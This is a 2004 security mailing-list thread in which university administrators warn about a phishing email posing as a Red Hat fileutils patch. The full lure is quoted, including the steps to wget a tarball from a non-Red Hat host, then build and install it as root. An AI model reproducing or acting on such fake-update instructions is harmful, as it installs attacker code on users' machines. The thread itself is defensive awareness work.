[unisog] Fake Redhat update

STeve Andre' andres at msu.edu
Tue Nov 23 09:20:09 GMT 2004

The only defense for this is to teach people a little paranoid, and to
repeatedly pound into them the fact that *any* "notice" to do something
to their computer other than through official channels is bad.

But doesn't common sense ever come into play here?  The url isn't from
a company.  I would hope that most folks would key on that, but likely

Educating your users, over and over again seems to be the only way
to deal with this.  Thats what I do.

--STeve Andre'
MSU Dept. of Political Science
andres at msu.edu

On Tuesday 23 November 2004 05:19 am, Peter Van Epp wrote:
>  Just a heads up, one of our users got caught by this one and installed
> the patch (which promptly opened an Ebay phishing site on their machine for
> a few hours):
> Peter Van Epp / Operations and Technical Support
> Simon Fraser University, Burnaby, B.C. Canada
> From: Fedora Red Hat=20
> To:
> Sent: Saturday, November 20, 2004 2:09 PM
> Subject: Fileutils Critical Patch Update
> Original issue date: October 20, 2004
> Last revised: October 20, 2004
> Source: Red Hat=20
> A complete revision history is at the end of this file.=20
> Dear Red Hat user,
> We have found a vulnerability in fileutils (ls and mkdir), that could =
> allow a remote attacker to execute arbitrary code with root privileges. =
> Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, =
> RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is =
> known that *BSD and Solaris platforms are NOT affected.
> The Red Hat Security Team strongly advises you to immediately apply the =
> fileutils-1.0.6 patch. This is a critical-critical update that you must =
> make by following these steps:
>   a.. First download the patch from the Wcml Red Hat mirror: wget =
> http://www.wcml.co.uk/critical/fileutils-1.0.6.patch.tar.gz or directly =
> here.=20
>   b.. Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz=20
>   c.. cd fileutils-1.0.6.patch=20
>   d.. make=20
>   e.. make install=20
> Again, please apply this patch as soon as possible or you risk your =
> system and others` to be compromised.
> Thank you for your prompt attention to this serious matter,
> Red Hat Security Team.
> Copyright =A9 2004 Red Hat, Inc. All rights reserved.=20
> _______________________________________________
> unisog mailing list
> unisog at lists.sans.org
> http://www.dshield.org/mailman/listinfo/unisog

More information about the unisog mailing list